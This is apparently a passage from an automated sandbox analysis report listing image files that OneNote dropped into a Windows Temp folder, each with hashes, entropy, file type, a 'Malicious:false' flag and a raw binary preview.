                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Temp\{A72C1100-6777-49FD-BE1C-84DA6400298D}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Temp\{A73F823E-4514-41FD-A0F4-39AE8B3B052F}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Temp\{A81AB157-1F04-42DE-AEE9-2E50C837A3C1}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Temp\{A8623239-FD5C-46E8-B842-97A8FFB0294E}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Temp\{A87B6A44-AC2E-46DC-B0C6-6ABDC4837476}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4819
                                                                                                  Entropy (8bit):7.874649683222419
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
                                                                                                  MD5:5D6C1F361BC04403555BE945E28E53FC
                                                                                                  SHA1:00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
                                                                                                  SHA-256:131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
                                                                                                  SHA-512:34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V.*..S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f*.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

                                                                                                  C:\Users\user\AppData\Local\Temp\{A98F4ECE-EA6B-48DE-A18B-2880912C2311}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Temp\{ABE4DB66-7708-4B46-81A5-E9C0ED9C8896}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Temp\{AC3DBF29-7FF0-488E-A552-F5E6A8CF8BC2}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Temp\{ACDA4D62-1241-4A1D-AFD3-A36F265DC672}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22203
                                                                                                  Entropy (8bit):6.977175130747846
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                  MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                  SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                  SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                  SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                  C:\Users\user\AppData\Local\Temp\{ADD3583C-323F-41EB-8402-41B73C38EC7E}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Temp\{AE62CF73-C1A1-46C5-839A-65980C1B6435}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):25622
                                                                                                  Entropy (8bit):7.058784902089801
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                  MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                  SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                  SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                  SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                  C:\Users\user\AppData\Local\Temp\{AFCD8FE3-723C-459A-B7E2-4E98E7A83E64}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Temp\{B0B1B803-7856-4903-BFEE-0DACB17A3B06}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
